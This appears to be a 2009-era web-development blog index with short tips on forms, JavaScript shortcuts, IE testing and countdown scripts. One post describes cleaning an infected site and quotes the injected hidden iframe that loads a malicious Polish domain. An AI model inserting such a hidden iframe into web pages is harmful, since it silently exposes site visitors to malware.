Turn Off Autocomplete Form in Internet Explorer
Nov1
A webmastersucks user ask me “The only problem is that IE will store the MD5 ] password when it “saves” the password. Have you been able to overcome that?”. Solution is really simple, just we can use autocomplete attribute in form tag. It will be close autocomplete in form. It will better in password protected sites.
<form name="form" method="post" autocomplete="off">....</form>
What are the differences in HTML 5 and CSS3
Jul0
HTML 5 and css 3 is come to our life. But what are the differences in HTML 5 and CSS 3. In this article you can find details of HTML 5 and Css 3. We share HTML 5 Canvas Cheat Sheet in our posts.
http://perishablepress.com/press/2009/07/19/power-of-html5-css3/
Iframe Virus jl.chura.pl Removal
Jun4
Today i upload an index file to my web site and i saw an iframe that site. I am shocked. Because i never use any iframe. I enter another sites for checking. All web sites are iframed. In my explorer all web sites are virused. I checked my sites to my friends. They saw iframe virus in my site. I search this virus, it is changing index and default files. Add code like here..
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
UPDATED (5th June 2009):
After a while, virus come back. I used Avast Free Version, that is find all viruses and removed. But it is damaged infected files. All infected .html and .php files are deleted. Download Avast Home Edition >
This virus also affected your google results. Google can block your site because of badware. You have to read “My site’s been hacked – now what?” and after remove your virus you have to read “Hey Google, I no longer have badware“.
PS: I am not guarenteed virus removal, these are only what i do.
HTML5 Canvas Cheat Sheet v1.0
Jun5
Here is canvas cheat sheet of HTML5.
Web Site Color Schemes
Jun1
Webmasters basic problem is selecting color. If you select color, design is coming with that color. Here is some color scheme tools and color scheme selectors. You can select one color and you can see other colors which are beatiful with that colour.
Using Keyboard Shortcuts in Javascript
Jun1
New type of web sites use keyboards for some functions. It is always helping more usable. I hope this codes will help your web site.
In the following example, we’re simply going to verify the key pressed down by the user. If the key pressed are Ctrl+S, a function will be triggered.
var isCtrl = false;
document.onkeyup=function(e) {
if(e.which == 17) isCtrl=false;
}document.onkeydown=function(e){
if(e.which == 17) isCtrl=true;
if(e.which == 83 && isCtrl == true) {
alert('Keyboard shortcuts are cool!');
return false;
}
}
Example with the JQuery framework
var isCtrl = false;$(document).keyup(function (e) {
if(e.which == 17) isCtrl=false;
}).keydown(function (e) {
if(e.which == 17) isCtrl=true;
if(e.which == 83 && isCtrl == true) {
alert('Keyboard shortcuts + JQuery are even more cool!');
return false;
}
});
For more and keyboard shorcuts codes click here>
Test Your Web Sites in IE8, IE7 IE 6 and IE5.5
Jun1
All webmasters first problem is browser testing. Also Internet Explorer testing is like killing your self. I found this program and it saves my life. IETester is test your sites in Internet Explorer 5.5, 6, 7, 8.
They say about them selves “IETester is a free WebBrowser that allows you to have the rendering and javascript engines of IE8, IE7 IE 6 and IE5.5 on Vista and XP, as well as the installed IE in the same process.”
Countdown Date & Time JavaScript
Jun2
I need javascript to countdown a date but with time. I search a lot and find a solution. Here it is
You can use in your HTML file:
Dont worry! Only <script language="JavaScript"> TargetDate = "6/11/2010 1:00"; BackColor = "white"; ForeColor = "navy"; CountActive = true; CountStepper = -1; LeadingZero = true; DisplayFormat = "%%D%% Day, %%H%% Hour, %%M%% Minute, %%S%% Second "; FinishMessage = "World cup start.."; </script> <script language="JavaScript" src="countdown.js"></script> left to begin World Cup 2010.


